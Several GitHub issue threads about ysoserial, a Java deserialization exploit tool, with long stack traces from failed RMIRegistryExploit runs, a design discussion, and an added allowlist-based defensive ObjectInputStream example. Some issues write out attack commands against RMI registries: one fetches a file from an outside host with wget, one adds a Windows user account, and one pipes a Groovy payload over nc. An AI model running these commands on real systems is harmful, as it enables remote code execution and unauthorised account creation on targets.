Is there a reason why "ping -c 4 " works, but "ping -c 2 ; ping -c 2 " doesn't work when generating payloads? I can't seem to get anything that isn't a single command to work (no output redirection, no multiple commands, etc.).

README error

README states:

nc 10.10.10.10 < groovypayload.bin

this should be

nc 10.10.10.10 1099 < groovypayload.bin

right?

JitPack link in README fails

Clicking the JitPack link in the README to download the .jar file leads to an error:

"Tag or commit 'master-v0.0.5-16-gb617b7b' not found. Rechecking."

java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet

I downloaded the source from GitHub, but I cannot test "CommonsCollections3"; it pops up the error below. How do I solve this error? Thank you.

My env is Windows, java version "1.8.0_121".

java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81)
at com.sun.proxy.$Proxy0.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
at ysoserial.Deserializer.deserialize(Deserializer.java:27)
at ysoserial.Deserializer.deserialize(Deserializer.java:22)
at ysoserial.payloads.util.PayloadRunner.run(PayloadRunner.java:37)
at ysoserial.payloads.CommonsCollections3.main(CommonsCollections3.java:60)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.intellij.rt.execution.application.AppMain.main(AppMain.java:144)

An Error Of "java -cp ysoserial-master.jar ysoserial.exploit.RMIRegistryExploit "

The whole command I use is "java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit [MyHost] 1099 CommonsCollections1 calc.exe"
And the Error is:
java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(Unknown Source)
at com.sun.proxy.$Proxy3.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at java.util.HashMap.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.access$300(Unknown Source)
at java.io.ObjectInputStream$GetFieldImpl.readFields(Unknown Source)
at java.io.ObjectInputStream.readFields(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.lambda$run$0(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.executeCall(Unknown Source)
at sun.rmi.server.UnicastRef.invoke(Unknown Source)
at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:44)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:38)
at ysoserial.secmgr.ExecCheckingSecurityManager.callWrapped(ExecCheckingSecurityManager.java:72)
at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:38)
at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:32)
How do I resolve this? The target has commons-collections 3.2.1 and port 1099 open for rmiregistry.

The POC works but it breaks with a back-trace

The POC works, but the program crashes...
I hope this back-trace help the developers! :)


Release: 0.0.2

java -cp ysoserial-0.0.2-all.jar ysoserial.RMIRegistryExploit X.Y.Z.A 1099 CommonsCollections1 "wget http://X.X.Y.Y/test.txt -O /tmp/test.txt"
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at com.sun.proxy.$Proxy4.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at java.util.HashMap.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.defaultReadObject(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:276)
at sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:253)
at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:379)
at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:30)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:23)
at ysoserial.ExecBlockingSecurityManager.wrap(ExecBlockingSecurityManager.java:39)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:23)
looking up 'X.Y.Z.A.Naming'
java.rmi.UnmarshalException: error unmarshalling return; nested exception is:
java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at sun.rmi.registry.RegistryImpl_Stub.lookup(Unknown Source)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:40)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:23)
at ysoserial.ExecBlockingSecurityManager.wrap(ExecBlockingSecurityManager.java:39)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:23)
Caused by: java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.rmi.server.LoaderHandler$Loader.loadClass(LoaderHandler.java:1207)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at sun.rmi.server.LoaderHandler.loadClassForName(LoaderHandler.java:1221)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:453)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:186)
at java.rmi.server.RMIClassLoader$2.loadClass(RMIClassLoader.java:637)
at java.rmi.server.RMIClassLoader.loadClass(RMIClassLoader.java:264)
at sun.rmi.server.MarshalInputStream.resolveClass(MarshalInputStream.java:214)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1774)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
... 5 more
looking up 'AAAAA.Naming'
java.rmi.UnmarshalException: error unmarshalling return; nested exception is:
java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at sun.rmi.registry.RegistryImpl_Stub.lookup(Unknown Source)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:40)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:23)
at ysoserial.ExecBlockingSecurityManager.wrap(ExecBlockingSecurityManager.java:39)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:23)
Caused by: java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.rmi.server.LoaderHandler$Loader.loadClass(LoaderHandler.java:1207)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at sun.rmi.server.LoaderHandler.loadClassForName(LoaderHandler.java:1221)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:453)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:186)
at java.rmi.server.RMIClassLoader$2.loadClass(RMIClassLoader.java:637)
at java.rmi.server.RMIClassLoader.loadClass(RMIClassLoader.java:264)
at sun.rmi.server.MarshalInputStream.resolveClass(MarshalInputStream.java:214)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1774)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
... 5 more


Release 0.0.1

java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit X.Y.Z.A 1099 CommonsCollections1 "wget http://X.X.Y.Y/test.txt -O /tmp/test.txt"
Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at com.sun.proxy.$Proxy4.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at java.util.HashMap.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.defaultReadObject(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:276)
at sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:253)
at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:379)
at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:21)

Thanks for this wonderful POC! :)

No security manager: RMI class loader disabled

First of all, thanks for your work, it's awesome.

I'm testing a host that uses the RMI protocol on port 22099. I could connect to it using the "jconsole" tool. However, using ysoserial, I get the following stacktrace.

  • Command:

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit <ip> 22099 CommonsCollections1 "/sbin/ifconfig"

I have tried many different payloads to be sure and different CommonsCollections but the problem is still present.

  • Stacktrace:
java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: 
    java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 
    java.lang.ClassNotFoundException: org.apache.commons.collections.map.LazyMap (no security manager: RMI class loader disabled)
    at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:400)
    at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:255)
    at sun.rmi.transport.Transport$1.run(Transport.java:168)
    at java.security.AccessController.doPrivileged(AccessController.java:279)
    at sun.rmi.transport.Transport.serviceCall(Transport.java:164)
    at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:506)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.handleRequest(TCPTransport.java:838)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:912)
    at java.lang.Thread.run(Thread.java:810)
        .......

The application server installed on the remote host is a Websphere. The RMI protocol uses serialized data, so I think it has to be vulnerable to apache commons vulnerabilities.

Thanks for your help, I will have access to this host until thursday.

question about transformerChain

In CommonsCollections1, you first create a useless ChainedTransformer, transformerChain (I say it's useless because it only contains constantTransformer(1)), then use the decorate method of LazyMap to create TransformedMap. At last, you use Java reflection to modify the attribute iTransformers to the malicious transformers.
Why don't you just directly set transformerChain with the transformers? Or is there a security check that forbids this behavior?

Why do all the serialized payloads contain java.lang.Override?

I am attempting to use ysoserial to generate a Groovy1 payload against an old version of Elasticsearch. The payload fails to deserialize due to the presence of java.lang.Override. Specifically, Elasticsearch seems to call the following function when resolving classes contained within a serialized stream:

    protected ObjectStreamClass readClassDescriptor() throws IOException, ClassNotFoundException {
        int type = read();
        if (type < 0) {
            throw new EOFException();
        }
        switch (type) {
            case ThrowableObjectOutputStream.TYPE_EXCEPTION:
                return ObjectStreamClass.lookup(Exception.class);
            case ThrowableObjectOutputStream.TYPE_STACKTRACEELEMENT:
                return ObjectStreamClass.lookup(StackTraceElement.class);
            case ThrowableObjectOutputStream.TYPE_FAT_DESCRIPTOR:
                return super.readClassDescriptor();
            case ThrowableObjectOutputStream.TYPE_THIN_DESCRIPTOR:
                String className = readUTF();
                Class<?> clazz = loadClass(className);
                return ObjectStreamClass.lookup(clazz);
            default:
                throw new StreamCorruptedException("Unexpected class descriptor type: " + type);
        }
    }

ObjectStreamClass.lookup(clazz) returns null when clazz == "java.lang.Override". I am not entirely sure what the purpose of java.lang.Override is in the serialized object but is there any way of generating payloads which do not contain this class?

Thanks in advance for the help.
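Some background for this question: the AnnotationInvocationHandler constructor takes an annotation type and a member map, and ysoserial's CommonsCollections1 and Groovy1 payloads pass Override.class as that type, so the class descriptor for java.lang.Override is written as part of the handler's own state. The defensive counterpart below is an added example written for this page, not code from ysoserial or Elasticsearch: a look-ahead ObjectInputStream that checks every class descriptor against an allowlist inside resolveClass, before the JVM instantiates anything, and refuses dynamic proxies outright, so no readObject() gadget ever runs. The allowlist contents and the PriorityQueue stand-in for an unexpected class are constructed for the demonstration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.PriorityQueue;
import java.util.Set;

/** Look-ahead deserialization: every class descriptor is vetted in resolveClass(),
 *  which runs before the object is allocated, so a rejected class never gets its
 *  readObject() executed. (Added example; assumed class and method names.) */
public class LookAheadObjectInputStream extends ObjectInputStream {
    private final Set<String> allowed;
    private final List<String> seen = new ArrayList<>();

    public LookAheadObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
        super(in);
        this.allowed = allowed;
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        seen.add(name);
        if (!allowed.contains(name)) {
            throw new InvalidClassException(name, "class not on the deserialization allowlist");
        }
        return super.resolveClass(desc);
    }

    @Override
    protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
        // Dynamic proxies are how the AnnotationInvocationHandler chains route map calls
        // into transformers; a stream that needs one is never legitimate here.
        throw new InvalidClassException("java.lang.reflect.Proxy", "proxy classes are not allowed");
    }

    /** Class names seen so far, in stream order; useful when tuning the allowlist. */
    public List<String> seenClasses() {
        return seen;
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed allowlist: Integer's descriptor is followed by its superclass Number,
        // and resolveClass() is invoked for superclass descriptors as well.
        Set<String> allowed = new HashSet<>(Arrays.asList(
                "java.util.HashMap", "java.lang.Integer", "java.lang.Number"));

        Map<String, Integer> benign = new HashMap<>();
        benign.put("answer", 42);
        try (LookAheadObjectInputStream in =
                     new LookAheadObjectInputStream(new ByteArrayInputStream(serialize(benign)), allowed)) {
            System.out.println("accepted: " + in.readObject() + " classes=" + in.seenClasses());
        }

        // Constructed stand-in for an unexpected top-level class in the stream.
        PriorityQueue<Integer> unexpected = new PriorityQueue<>(Arrays.asList(3, 1, 2));
        try (LookAheadObjectInputStream in =
                     new LookAheadObjectInputStream(new ByteArrayInputStream(serialize(unexpected)), allowed)) {
            in.readObject();
        } catch (InvalidClassException e) {
            // Thrown from resolveClass() on the very first descriptor; PriorityQueue.readObject()
            // and anything it would have compared never run.
            System.out.println("rejected before instantiation: " + e.getMessage());
        }
    }
}
```

The allowlist is deliberately a closed set of concrete class names rather than a package prefix: a prefix such as java.util. would still admit PriorityQueue, HashMap and the other JDK collections that gadget chains are built from.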

issue in An Error Of "java -cp ysoserial-master.jar ysoserial.exploit.RMIRegistryExploit"

Good morning Sir

I got this error on my box today. Would you please tell me what the root cause is and how to fix it?

  • I downloaded ysoserial and extracted it to the desktop
  • downloaded "ysoserial-master-v0.0.5" to this folder
  • installed Maven and ran "mvn clean package -DSkipTests"
  • renamed the master file to ysoserial.jar
  • ran the command below!

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit "mybox" "myport" CommonsCollections1 "net user /add user user"
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at com.sun.proxy.$Proxy92.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:346)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1004)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1891)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
at java.util.HashMap.readObject(HashMap.java:1155)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1004)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1891)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:499)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:331)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1004)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1891)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1913)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:409)
at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267)
at sun.rmi.transport.Transport$1.run(Transport.java:177)
at sun.rmi.transport.Transport$1.run(Transport.java:174)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Transport.java:173)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:553)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:808)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:667)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:722)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:283)
at sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:260)
at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:375)
at sun.rmi.registry.RegistryImpl_Stub.bind(RegistryImpl_Stub.java:68)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:44)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:38)
at ysoserial.secmgr.ExecCheckingSecurityManager.callWrapped(ExecCheckingSecurityManager.java:72)
at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:38)
at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:32)

Sincerely,

Support dependency isolation and/or conflicting versions

Project should be refactored to allow gadgets/chains to be generated (and unit tested) with exactly the required dependencies and versions, even in cases where two different gadgets/chains require a different version of the same library (See #16). This should also reduce the likelihood of unintended classes or dependencies accidentally leaking into the payloads.

The already included jboss shrinkwrap should suffice for runtime dependency management. Make sure dependencies for gadget chains can still be bundled in the jar somehow.

It is also a goal to keep the project build and code as simple as possible for people to contribute gadgets/chains.

Option 1: Reflection

Write or use a reflection DSL so that payload generation code can use gadget classes dynamically instead of through statically linked code.

Something like jOOR might be useful for reflection.

Pros: Simple build process
Cons: Convoluted reflection-based payload generation code

Option 2: Maven/Build Voodoo

Split up project into multi-module with aggregator project to generate all-in-one jar. Gadgets/chains can go into an arbitrary number of separate sub-projects according to any dependency version conflicts.
